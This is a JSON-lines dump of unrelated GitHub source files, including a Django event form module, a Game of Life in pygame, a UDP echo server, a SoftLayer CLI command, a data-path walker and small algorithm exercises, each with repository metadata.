(\n PluginConfig.objects.using(using_database)\n .filter(\n team=team,\n enabled=True,\n plugin__pluginsourcefile__filename=\"site.ts\",\n plugin__pluginsourcefile__status=PluginSourceFile.Status.TRANSPILED,\n )\n .values_list(\n \"id\",\n \"web_token\",\n \"plugin__pluginsourcefile__updated_at\",\n \"plugin__updated_at\",\n \"updated_at\",\n )\n .all()\n )\n\n def site_app_url(source: tuple) -> str:\n hash = md5(f\"{source[2]}-{source[3]}-{source[4]}\".encode(\"utf-8\")).hexdigest()\n return 
f\"/site_app/{source[0]}/{source[1]}/{hash}/\"\n\n return [asdict(WebJsUrl(source[0], site_app_url(source))) for source in sources]\n\n\ndef get_site_config_from_schema(config_schema: Optional[List[dict]], config: Optional[dict]):\n if not config or not config_schema:\n return {}\n return {\n schema_element[\"key\"]: config.get(schema_element[\"key\"], schema_element.get(\"default\", None))\n for schema_element in config_schema\n if schema_element.get(\"site\", False) and schema_element.get(\"key\", False)\n }\n","repo_name":"PostHog/posthog","sub_path":"posthog/plugins/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"1890328886","text":"import sys\nfrom socket import *\n\ns = socket(AF_INET, SOCK_DGRAM)\ns.bind((\"0.0.0.0\", int(sys.argv[1])))\n\nprint(\"Listening...\")\nwhile 1:\n\tmsg, addr = s.recvfrom(65536)\n\tprint(\"Received %d bytes from %s\" % (len(msg) + 20 + 8, str(addr)))\n\ts.sendto(msg, addr)\n","repo_name":"Kavarenshko/plp-mtu-discovery","sub_path":"udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"18551250138","text":"import random\nimport sys\nfrom datetime import datetime\nimport pygame\nimport copy\nimport numpy as np\n\n\nclass LifeGame:\n\tdef __init__(self, screen_width=800, screen_height=600, cell_size=10, alive_color=(0, 255, 255),\n\t\t\t\t dead_color=(0, 0, 0), max_fps=10):\n\n\t\tpygame.init()\n\t\tself.screen_width = screen_width\n\t\tself.screen_height = screen_height\n\t\tself.cell_size = cell_size\n\t\tself.alive_color = alive_color\n\t\tself.dead_color = dead_color\n\n\t\tself.screen = pygame.display.set_mode((self.screen_width, self.screen_height))\n\t\tself.clear_screen()\n\t\tpygame.display.flip()\n\n\t\tself.last_update_completed = 0\n\t\tself.desired_milliseconds_between_updates = (1.0 / max_fps) * 1000.0\n\n\t\tself.num_cols = int(self.screen_width / self.cell_size)\n\t\tself.num_rows = int(self.screen_height / self.cell_size)\n\t\tself.active_grid = 0\n\t\tself.grids = []\n\n\t\tself.init_grids()\n\t\tself.set_grid()\n\n\t\tself.paused = False\n\t\tself.game_over = False\n\n\tdef init_grids(self):\n\n\t\tdef create_grid():\n\t\t\trows = []\n\t\t\tfor row_num in range(self.num_rows):\n\t\t\t\tlist_of_columns = [0] * self.num_cols\n\t\t\t\trows.append(list_of_columns)\n\t\t\treturn rows\n\n\t\tself.grids.append(create_grid())\n\t\tself.grids.append(create_grid())\n\n\tdef set_grid(self, value=None, grid=0):\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tif value is None:\n\t\t\t\t\tcell_value = np.random.choice([0, 255], p=[0.8, 0.2])\n\t\t\t\telse:\n\t\t\t\t\tcell_value = value\n\t\t\t\tself.grids[grid][r][c] = cell_value\n\n\tdef draw_grid(self):\n\t\tself.clear_screen()\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tif self.grids[self.active_grid][r][c] == 255:\n\t\t\t\t\tcolor = self.alive_color\n\t\t\t\telse:\n\t\t\t\t\tcolor = self.dead_color\n\t\t\t\tpygame.draw.circle(self.screen,\n\t\t\t\t\t\t\t\t color,\n\t\t\t\t\t\t\t\t (int(c * self.cell_size + (self.cell_size / 2)),\n\t\t\t\t\t\t\t\t\tint(r * self.cell_size + (self.cell_size / 2))),\n\t\t\t\t\t\t\t\t int(self.cell_size / 2),\n\t\t\t\t\t\t\t\t 0)\n\t\tpygame.display.flip()\n\n\tdef 
clear_screen(self):\n\t\tself.screen.fill(self.dead_color)\n\n\tdef inactive_grid(self):\n\t\tinactive_grid = (self.active_grid + 1) % 2\n\t\treturn inactive_grid\n\n\tdef check_cell_neighbors(self, row_index, col_index, grid):\n\t\t# self.grids[self.active_grid][r][c] # current cell\n\t\ttotal = int((grid[row_index][(col_index - 1) % self.num_cols] + grid[row_index][(col_index + 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][col_index] + grid[(row_index + 1) % self.num_rows][col_index] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][(col_index - 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][(col_index + 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index + 1) % self.num_rows][(col_index - 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index + 1) % self.num_rows][(col_index + 1) % self.num_cols])/255)\n\n\t\t# Apply rules\n\t\tval = int()\n\t\tif grid[row_index][col_index] == 255:\n\t\t\tif (total < 2) or (total > 3):\n\t\t\t\tval = 0\n\t\t\telse:\n\t\t\t\tval = grid[row_index][col_index]\n\t\telse:\n\t\t\tif total == 3:\n\t\t\t\tval = 255\n\t\treturn val\n\n\tdef update_generation(self):\n\t\t# TODO\n\t\t# Inspect the current active generation\n\t\tgrid = copy.deepcopy(self.grids[self.active_grid])\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tnext_gen_state = self.check_cell_neighbors(r, c, grid)\n\t\t\t\tself.grids[self.inactive_grid()][r][c] = next_gen_state\n\n\t\tself.active_grid = self.inactive_grid()\n\n\tdef handle_events(self):\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tprint(\"Key pressed\")\n\t\t\t\tif event.unicode == 's':\n\t\t\t\t\tif self.paused:\n\t\t\t\t\t\tself.paused = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.paused = True\n\t\t\t\telif event.unicode == 'r':\n\t\t\t\t\tself.active_grid = 0\n\t\t\t\t\tself.set_grid(None, self.active_grid)\n\t\t\t\t\tself.draw_grid()\n\t\t\t\telif event.unicode == 'q':\n\t\t\t\t\tself.game_over = True\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\n\tdef cap_frame_rate(self):\n\t\tnow = pygame.time.get_ticks()\n\t\tmilliseconds_since_last_update = now - self.last_update_completed\n\t\ttime_to_sleep = self.desired_milliseconds_between_updates - milliseconds_since_last_update\n\t\tif time_to_sleep > 0:\n\t\t\tpygame.time.delay(int(time_to_sleep))\n\t\tself.last_update_completed = now\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tif self.game_over:\n\t\t\t\treturn\n\t\t\tself.handle_events()\n\n\t\t\tif self.paused:\n\t\t\t\tcontinue\n\n\t\t\tself.update_generation()\n\t\t\tself.draw_grid()\n\t\t\tself.cap_frame_rate()\n\n\nif __name__ == '__main__':\n\tgame = LifeGame()\n\tgame.run()\n","repo_name":"0imami0/GOL","sub_path":"GOL2.py","file_name":"GOL2.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35901760896","text":"import modules\r\n\r\nprint(\"Welcome to the flip a coin game! You can pick how many times you want to flip a coin, and this program will tell you how many were heads and how many were tails.\\nLet's Begin!\")\r\n\r\nwhile True:\r\n\r\n num = modules.ask()\r\n\r\n results = modules.flip_count(num)\r\n\r\n print(\r\n f\"Over {num} flips, the results are {results[0]} heads and {results[1]} tails!\\n\")\r\n\r\n if input(\"Would you like to play again? 
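check_cell_neighbors above wraps row/column indices with % num_rows / % num_cols, i.e. the board is a torus. The same toroidal neighbor count can be vectorized with np.roll; a sketch independent of the pygame class, verified on a period-2 blinker.

import numpy as np

def life_step(grid):                       # grid of 0/255, like the class above
    cells = (grid == 255).astype(int)
    # sum of the eight shifted copies = neighbor count with wraparound
    total = sum(np.roll(np.roll(cells, dr, 0), dc, 1)
                for dr in (-1, 0, 1) for dc in (-1, 0, 1)
                if (dr, dc) != (0, 0))
    born = (cells == 0) & (total == 3)
    survive = (cells == 1) & ((total == 2) | (total == 3))
    return np.where(born | survive, 255, 0)

blinker = np.zeros((5, 5), dtype=int)
blinker[2, 1:4] = 255
assert (life_step(life_step(blinker)) == blinker).all()  # oscillates with period 2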
(y/n): \").lower() == 'y':\r\n continue\r\n else:\r\n print(\"Thanks for playing!\")\r\n break\r\n","repo_name":"darth4114/CoinFlipSim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20522966272","text":"from typing import Union, Optional, Dict, Any, AsyncGenerator, List\nfrom .base_storage import BaseStorage\nfrom ..logger import LOGGER\n\n\nclass MemoryStorage(BaseStorage):\n def __init__(self, default_language: str = 'en'):\n super().__init__(default_language=default_language)\n self._message_history: Dict[str, int] = dict()\n\n async def set_user_language(self, user_id: int, language: str):\n await super().set_user_language(user_id=user_id, language=language)\n if not self.users.get(str(user_id)): # Check if user exists so it won't fail\n self.users[str(user_id)] = {}\n\n self.users[str(user_id)]['language'] = language\n LOGGER.info(f'Set language to {language} for {user_id}')\n\n async def get_user_language(self, user_id: int) -> str:\n lang = self.users.get(str(user_id), {}).get('language', self.default_language)\n await super().set_user_language(user_id=user_id, language=lang)\n LOGGER.info(f'Retrieved language for {user_id}: {lang}')\n return lang\n\n async def set_user_data(self, user_id: int, data: Optional[Dict[str, Any]] = None,\n replace: bool = False) -> Dict[str, Any]:\n if data is None:\n data = dict()\n replace = True\n\n if replace:\n user_data = data\n else:\n user_data = await self.get_user_data(user_id=user_id)\n user_data.update(data)\n\n if not self.users.get(str(user_id)): # Check if user exists so it won't fail\n self.users[str(user_id)] = {}\n\n self.users[str(user_id)]['data'] = user_data\n LOGGER.info(f'Set user data for {user_id}: {user_data}')\n return user_data\n\n async def get_user_data(self, user_id: int) -> Dict[str, Any]:\n data = self.users.get(str(user_id), {}).get('data', {})\n LOGGER.info(f'Fetched user data for {user_id}: {data}')\n return data\n\n async def set_user_menu(self, user_id: int, menu: Optional[str] = None):\n await self.set_user_data(user_id=user_id, data={'menu': menu})\n return menu\n\n async def get_user_menu(self, user_id: int) -> Optional[str]:\n return (await self.get_user_data(user_id=user_id)).get('menu')\n\n async def check_user_exists(self, user_id: int) -> bool:\n exists: bool = bool(self.users.get(str(user_id)))\n LOGGER.info(f'Checked existence of {user_id}: {exists}')\n return exists\n\n async def set_last_message_id(self, user_id: int, message_id: int):\n LOGGER.info(f'Set last message ID for {user_id}: {message_id}')\n self._message_history[str(user_id)] = message_id\n\n async def get_last_message_id(self, user_id: int) -> Optional[int]:\n message_id = self._message_history.get(str(user_id))\n LOGGER.info(f'Retrieved last message ID for {user_id}: {message_id}')\n return message_id\n\n async def create_user(self, user_id: int, language: Optional[str] = None):\n if language is None:\n language = self.default_language\n\n self.users[str(user_id)] = {'language': language}\n LOGGER.info(f'Created a new user: {user_id}, {language}')\n\n async def apply(self, query, args=None):\n pass\n\n async def select(self, query, args=None) -> AsyncGenerator[Dict[str, Any], None]:\n yield\n\n async def get(self, query: str, args=None, fetch_all: bool = False) -> Union[bool, List[Dict[str, Any]],\n Dict[str, Any]]:\n pass\n\n async def check(self, query: str, args=None) -> int:\n 
pass\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"NekoGram/storages/memory_storage.py","file_name":"memory_storage.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74271640169","text":"from django import forms\nfrom datetime import date, datetime, timedelta\n\nfrom events.models import Event\nfrom events.models import Who, When, Event\nfrom profiles.models import ClassGroup, User\nfrom pedagogy.models import Subject, SubjectModality\nfrom locations.models import Place, Campus\n\nfrom utils.widgets import SelectableTimeWidget\nfrom utils.fields import UserChoiceField\n\nclass UserEventForm(forms.Form):\n name = forms.CharField(label=\"Event name\")\n date = forms.DateField(widget=forms.DateInput(attrs={'class':'datepicker'}))\n start_hour = forms.IntegerField(widget=SelectableTimeWidget())\n duration = forms.IntegerField(widget=SelectableTimeWidget(end_hour=5))\n place_text = forms.CharField(label=\"Place\", required=False)\n\n def _build_event(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.id\n event = Event(name=self.cleaned_data['name'],\n duration=self.cleaned_data['duration'],\n place_text=self.cleaned_data['place_text'],\n id=old_id)\n return event\n\n def _build_when(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.id\n correct_date = \"%s %s\" % (self.cleaned_data['date'],\n self.cleaned_data['start_hour'])\n correct_date = datetime.strptime(correct_date, \"%Y-%m-%d %H\")\n when = When(date=correct_date, id=old_id)\n return when\n\n def save(self, when=None):\n if self.is_valid():\n event = self._build_event(when)\n when = self._build_when(when)\n event.save()\n when.event = event\n when.save()\n return when\n return False\n\n#capitaine skeletor pour le reste des forms du campus manager\nclass ClassgroupEventForm(UserEventForm):\n user = None\n classgroup = forms.ModelChoiceField(queryset=None, label=\"Class\")\n subject = forms.ModelChoiceField(queryset=Subject.objects.all(),\n label=\"Subject\")\n modality = forms.CharField(max_length=20,\n widget=forms.Select(choices=SubjectModality.TYPE_CHOICES))\n place = forms.ModelChoiceField(queryset=None, label=\"Place\")\n contributor = UserChoiceField(\n queryset=User.objects.filter(profile__is_teacher=True),\n label=\"Teacher\", required=False)\n force_display = forms.BooleanField(required=False)\n \n def __init__(self, user=None, *args, **kwargs):\n super(ClassgroupEventForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['classgroup'].queryset = ClassGroup.objects\\\n .get_managed_by(self.user)\n self.fields['place'].queryset = Place.objects.get_managed_by(self.user)\n \n def _build_classgroup(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.who_set.get(classgroup__isnull=False).id\n return Who(classgroup=self.cleaned_data['classgroup'], id=old_id)\n\n def save(self, when=None): \n if self.is_valid(): \n f = self.cleaned_data \n event = self._build_event(when)\n event.force_display=self.cleaned_data['force_display']\n event.subject_modality = SubjectModality.objects.filter( \n subject=f['subject']).filter(type=f['modality']).get() \n event.save() \n event.places.clear()\n event.places.add(f['place']) \n who = self._build_classgroup(when)\n who.event = event\n who.save()\n\n # add teacher\n contributor = self.cleaned_data['contributor']\n if 
contributor is not None:\n teacher = Who(user=contributor, is_contributor=True, event=event)\n teacher.save()\n when = self._build_when(when)\n when.event = event\n when.save()\n return when\n return False\n\nclass CampusEventForm(UserEventForm):\n user = None\n \n campus = forms.ModelChoiceField(queryset=None,\n label=\"Campus\", required=False)\n place = forms.ModelChoiceField(queryset=None,\n label=\"Place\", required=False)\n contributor = UserChoiceField(\n queryset=User.objects.filter(profile__is_teacher=True),\n label=\"Main Contributor\", required=False)\n force_display = forms.BooleanField(required=False)\n \n def __init__(self, user=None, *args, **kwargs):\n super(CampusEventForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['place'].queryset = Place.objects.get_managed_by(self.user)\n self.fields['campus'].queryset = Campus.objects.get_managed_by(self.user)\n\n def _build_campus(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.who_set.get(campus__isnull=False).id\n return Who(campus=self.cleaned_data['campus'], id=old_id)\n\n def save(self, when=None):\n if self.is_valid():\n event = self._build_event(when)\n event.force_display=self.cleaned_data['force_display']\n event.save()\n if self.cleaned_data['place'] is not None:\n event.places.clear()\n event.places.add(self.cleaned_data['place']) \n who = self._build_campus(when)\n who.event = event\n who.save()\n when = self._build_when(when)\n when.event = event\n when.save()\n return when\n return False\n \nclass MoveEventForm(forms.Form):\n days = forms.IntegerField()\n minutes = forms.IntegerField()\n all_day = forms.BooleanField()\n\n \nclass MySelectorForm(forms.Form):\n user = None\n calendars = forms.MultipleChoiceField(choices=\n [(\"my_campus\", \"My Campus\"),\n (\"my_classgroup\", \"My Class\"),\n (\"my_user\", \"Mine\")],\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, what=[], *args, **kwargs):\n super(MySelectorForm,self).__init__(*args, **kwargs)\n if what == []:\n self.initial['calendars'] = (\"my_user\", \"my_classgroup\")\n return\n new_choices = []\n for option in self.fields['calendars'].choices:\n if option[0] in what:\n new_choices.append(option)\n self.fields['calendars'].choices = new_choices\n self.initial['calendars'] = (\"my_user\",)\n\nclass CampusSelectorForm(forms.Form):\n user = None\n campus = forms.ModelMultipleChoiceField(queryset=None,\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, user=None, *args, **kwargs):\n super(CampusSelectorForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['campus'].queryset =\\\n Campus.objects.get_managed_by(self.user)\n\nclass ClassgroupSelectorForm(forms.Form):\n user = None\n classgroup = forms.ModelMultipleChoiceField(queryset=None,\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, user=None, *args, **kwargs):\n super(ClassgroupSelectorForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['classgroup'].queryset =\\\n ClassGroup.objects.get_managed_by(self.user)\n\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"71486885927","text":"from urllib import request\nfrom project import Project\nimport toml\n\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # the string contents of the file\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n\n toml_dict=toml.loads(content)\n\n p_name=toml_dict[\"tool\"][\"poetry\"][\"name\"]\n p_description=toml_dict[\"tool\"][\"poetry\"][\"description\"]\n p_dependencies=toml_dict[\"tool\"][\"poetry\"][\"dependencies\"]\n p_dev_dependencies=toml_dict[\"tool\"][\"poetry\"][\"dev-dependencies\"]\n # deserialize the TOML-format string and build a Project object from its data\n return Project(p_name, p_description, p_dependencies.keys(), p_dev_dependencies.keys())\n","repo_name":"Nanotiike/palautusrepositorio","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15888706862","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef get_data(fname):\n data = np.loadtxt(fname, delimiter=\",\")\n data[:, 1:] = data[:, 0, None] / (data[:, 1:] / 1000)\n data[:, 0] *= 1000000\n return data\n\nfig, axes = plt.subplots(1, 2, figsize=[15, 7])\nfnames = [\"result_32.csv\", \"result_64.csv\"]\ntitles = [\"Sort 32-bit key-value pairs\", \"Sort 64-bit key-value pairs\"]\nfor i in range(2):\n data = get_data(fnames[i])\n axes[i].grid(which=\"major\")\n axes[i].set_xscale(\"log\")\n axes[i].plot(data[:, 0], data[:, 1], data[:, 0], data[:, 2], data[:, 0], data[:, 3])\n axes[i].legend([\"CUB merge sort\", \"CUB radix sort\", \"Bitonic sort\"])\n axes[i].set_xlabel(\"Number of elements\")\n axes[i].set_ylabel(\"Sort rate (million elements / second)\")\n axes[i].set_title(titles[i])\n \nfig.suptitle(\"Performance comparison of different sorting algorithms\")\nplt.tight_layout()\nplt.savefig(\"benchmark.png\")","repo_name":"hanzhi713/bitonic-sort","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24878875197","text":"\"\"\"Edit the RWhois data on the account.\"\"\"\n# :license: MIT, see LICENSE for more details.\n\nimport click\n\nimport SoftLayer\nfrom SoftLayer.CLI import environment\nfrom SoftLayer.CLI import exceptions\n\n\n@click.command()\n@click.option('--abuse', help='Set the abuse email address')\n@click.option('--address1', help='Update the address 1 field')\n@click.option('--address2', help='Update the address 2 field')\n@click.option('--city', help='Set the city name')\n@click.option('--company', help='Set the company name')\n@click.option('--country', help='Set the two-letter country code')\n@click.option('--firstname', help='Update the first name field')\n@click.option('--lastname', help='Update the last name field')\n@click.option('--postal', help='Set the postal code field')\n@click.option('--public/--private',\n default=None,\n help='Flags the address as a public or private residence.')\n@click.option('--state', help='Set the two-letter state code')\n@environment.pass_env\ndef cli(env, abuse, address1, address2, city, company, country, firstname,\n lastname, postal, public, state):\n \"\"\"Edit the RWhois data on the account.\"\"\"\n mgr = SoftLayer.NetworkManager(env.client)\n\n update = {\n 'abuse_email': abuse,\n 'address1': address1,\n 'address2': address2,\n 'company_name': company,\n 'city': city,\n 'country': country,\n 'first_name': firstname,\n 'last_name': lastname,\n 'postal_code': postal,\n 'state': state,\n 'private_residence': public,\n 
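ProjectReader above pulls the name, description and dependency tables out of a Poetry-style pyproject document with toml.loads. The same extraction on an inline string, so it runs without the network fetch; assumes the third-party toml package is installed.

import toml

PYPROJECT = """
[tool.poetry]
name = "demo"
description = "toy project"

[tool.poetry.dependencies]
python = "^3.8"
requests = "*"

[tool.poetry.dev-dependencies]
pytest = "*"
"""

poetry = toml.loads(PYPROJECT)["tool"]["poetry"]
# dependency tables are dicts, so their keys() give the package names
print(poetry["name"], list(poetry["dependencies"]), list(poetry["dev-dependencies"]))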
}\n\n if public is True:\n update['private_residence'] = False\n elif public is False:\n update['private_residence'] = True\n\n check = [x for x in update.values() if x is not None]\n if not check:\n raise exceptions.CLIAbort(\n \"You must specify at least one field to update.\")\n\n mgr.edit_rwhois(**update)\n","repo_name":"itirohidaka/PowerOff-Functions","sub_path":"virtualenv/lib/python2.7/site-packages/SoftLayer/CLI/rwhois/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4560170084","text":"from datapath import constants as c\nfrom datapath.format import compact_path\nfrom datapath.util import BranchingList, guess_type\n\n\ndef walk(data, function, root=None, parent=None, key=None, path=None):\n if root is None:\n root = data\n\n if path is None:\n path = BranchingList()\n\n data_type = guess_type(data)\n\n instruction = function(\n data=data, data_type=data_type, parent=parent, key=key, path=path)\n\n if instruction != c.WALK_CONTINUE:\n return instruction\n\n if data_type == c.TYPE_LEAF:\n return\n elif data_type == c.TYPE_DICT:\n items = data.iteritems()\n elif data_type == c.TYPE_LIST:\n items = enumerate(data)\n\n # Prevent changing size:\n items = tuple(items)\n\n for key, item in items:\n instruction = walk(\n # Things that don't change\n function=function, root=root,\n\n # Things that do\n data=item, key=key, parent=data,\n path=path.add((c.KEY_LITERAL | data_type, key))\n )\n\n if instruction == c.WALK_PRUNE:\n break\n\n if instruction == c.WALK_TERMINATE:\n return c.WALK_TERMINATE\n\n\ndef walk_path(data, function, path_parts,\n on_missing=c.ON_MISSING_CONTINUE,\n on_mismatch=c.ON_MISMATCH_CONTINUE,\n root=None):\n\n context = {\n 'root': root or data,\n 'function': function,\n 'path_parts': path_parts,\n 'on_mismatch': on_mismatch,\n 'on_missing': on_missing,\n }\n\n return _walk_path(context, data=data, path_pos=0, parent=None, key=None,\n path=BranchingList())\n\n\n# ---------------- # -------------------------------------------------------- #\n# Internal methods #\n# ---------------- #\n\ndef _walk_path(context, data, path_pos, parent, key, path):\n data_type = guess_type(data)\n\n instruction = context['function'](\n # Things which change all the time\n data=data, data_type=data_type, path_pos=path_pos,\n parent=parent, key=key, path=path,\n\n # Things we calculate to be nice\n terminal=path_pos == len(context['path_parts']),\n\n **context)\n\n if instruction != c.WALK_CONTINUE:\n return instruction\n\n # We've run out of path\n if path_pos >= len(context['path_parts']):\n return\n\n key_type, key = context['path_parts'][path_pos]\n\n if key_type & c.TRAVERSAL_RECURSE:\n return _path_recursion(\n data=data, parent=parent, path=path, path_pos=path_pos,\n context=context)\n\n elif not key_type & data_type:\n if context['on_mismatch'] == c.ON_MISMATCH_FAIL:\n raise ValueError('Expected %s but found %s at %s: %s' % (\n c.STRINGS[key_type & c.TYPE_MASK],\n c.STRINGS[data_type],\n data,\n compact_path(context['path_parts'])\n ))\n\n elif context['on_mismatch'] == c.ON_MISMATCH_CONTINUE:\n return c.WALK_CONTINUE\n else:\n raise Exception('wut?')\n\n # It's a super mad recursion into the data structure\n\n # A literal, we know exactly where to go\n elif key_type & c.KEY_LITERAL:\n try:\n data[key]\n except (KeyError, IndexError):\n if context['on_missing'] == c.ON_MISSING_CONTINUE:\n return\n elif context['on_missing'] == c.ON_MISSING_CREATE:\n 
data = _auto_fill(data, data_type, key,\n context['path_parts'], path_pos)\n\n return _walk_path(\n context, data=data[key], key=key, parent=data,\n path=path.add((c.KEY_LITERAL | data_type, key, path_pos)),\n path_pos=path_pos + 1)\n\n elif key_type & (c.KEY_WILD | c.KEY_SLICE):\n # A wild key\n if key_type & c.KEY_WILD:\n if data_type & c.TYPE_LIST:\n keys = xrange(len(data))\n elif data_type & c.TYPE_DICT:\n keys = data.iterkeys()\n else:\n raise ValueError('Unknown sub-object type')\n\n # Then it's a slice\n else:\n if data_type & c.TYPE_LIST and isinstance(key, slice):\n stop = max(key.stop or 0, len(data))\n keys = xrange(*key.indices(stop))\n else:\n # Literal values\n keys = key\n\n for key in keys:\n # TODO! - Some copy paste here from above.\n try:\n data[key]\n except (KeyError, IndexError):\n if context['on_missing'] == c.ON_MISSING_CONTINUE:\n continue\n elif context['on_missing'] == c.ON_MISSING_CREATE:\n data = _auto_fill(data, data_type, key,\n context['path_parts'], path_pos)\n else:\n raise\n\n instruction = _walk_path(\n context, data=data[key], key=key,\n parent=data, path_pos=path_pos + 1,\n path=path.add((c.KEY_LITERAL | data_type, key, path_pos)))\n\n if instruction == c.WALK_PRUNE:\n break\n\n if instruction == c.WALK_TERMINATE:\n return c.WALK_TERMINATE\n\n else:\n raise Exception('Bad key type')\n\n\ndef _auto_fill(data, data_type, key, path_parts, path_pos):\n if path_pos >= len(path_parts) - 1:\n next_type = c.TYPE_LEAF\n else:\n next_type, _ = path_parts[path_pos + 1]\n\n next_factory = c.TYPE_CODE_TO_TYPE[c.TYPE_MASK & next_type]\n\n # Auto extend lists if required\n if data_type & c.TYPE_LIST:\n if len(data) <= key:\n data.extend([next_factory() for _ in xrange(1 + key - len(data))])\n\n else:\n data[key] = next_factory()\n\n return data\n\n\ndef _path_recursion(data, parent, path, path_pos, context):\n # Generate a mini path to look for\n path_part = context['path_parts'][path_pos]\n search_path = ((path_part[0] ^ c.TRAVERSAL_RECURSE, path_part[1]),)\n\n # First find all the eligible entities\n\n work_list = []\n\n # The general search will find all entities\n def _general_search(path, **kwargs):\n # The path aware search will search the search path for eligible\n # items to resume the main path walk\n def _back_to_walk_path(parent, key, data, data_type, **_):\n if parent is None and key is None:\n return\n\n work_list.append(\n dict(data=data, parent=parent, key=key,\n path=path.add((c.KEY_LITERAL | guess_type(parent),\n key, path_pos))))\n\n walk_path(kwargs['data'], _back_to_walk_path, search_path)\n\n walk(data=data,\n function=_general_search,\n parent=parent, key=None, path=path)\n\n # Now start walking through the paths in them. We do this so we don't\n # create new items as we are searching and recurse infinitely\n\n path_pos += 1\n\n for item in work_list:\n _walk_path(path_pos=path_pos, context=context, **item)\n","repo_name":"jon-betts/python-datapath","sub_path":"datapath/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31150187872","text":"'''\nProblem\nGiven a graph, write a program that finds its minimum spanning tree.\n\nA minimum spanning tree is, among the subgraphs connecting all vertices of the given graph, the tree whose total edge weight is minimal.\n\nInput\nThe first line contains the number of vertices V (1 ≤ V ≤ 10,000) and the number of edges E (1 ≤ E ≤ 100,000). Each of the next E lines contains three integers A, B, C describing an edge, meaning that vertex A and vertex B are connected by an edge of weight C. C may be negative, and its absolute value does not exceed 1,000,000.\n\nThe vertices of the graph are numbered from 1 to V, and there is a path between any two vertices. Only data whose minimum spanning tree weight is greater than or equal to -2,147,483,648 and less than or equal to 2,147,483,647 is given as input.\n\nOutput\nPrint the weight of the minimum spanning tree on the first line.\n'''\n# minimum spanning tree\n\nV,E = map(int, input().split())\n\ncosts = []\nfor i in range(E):\n costs.append(tuple(map(int, input().split())))\n\ncosts.sort(key= lambda x: x[2]) # sort edges by ascending weight\n\nanswer = 0 # minimum total weight\nconnect = set([costs[0][0]]) \n# seed the spanning tree with an endpoint of the lightest edge\n\nwhile len(connect) != V: # until the tree contains every vertex\n for cost in costs:\n if cost[0] in connect and cost[1] in connect: # skip if both endpoints are already in the tree\n continue\n if cost[0] in connect or cost[1] in connect: # if exactly one endpoint is in the tree\n connect.update([cost[0], cost[1]]) # add the edge to the spanning tree\n answer += cost[2] # accumulate its weight\n break # restart the scan from the lightest edge\nprint(answer)\nprint(connect)","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/bj_1197.py","file_name":"bj_1197.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38796284182","text":"class Solution:\n def findSubsequences(self, nums):\n ans = set()\n\n def dfs(step, track):\n if step > len(nums):\n return\n if len(track) >= 2:\n if track[-1] < track[-2]:\n return\n temp = tuple(track)\n if temp not in ans:\n ans.add(temp)\n for i in range(step, len(nums)):\n track.append(nums[i])\n dfs(i+1, track)\n track.pop()\n dfs(0, [])\n return 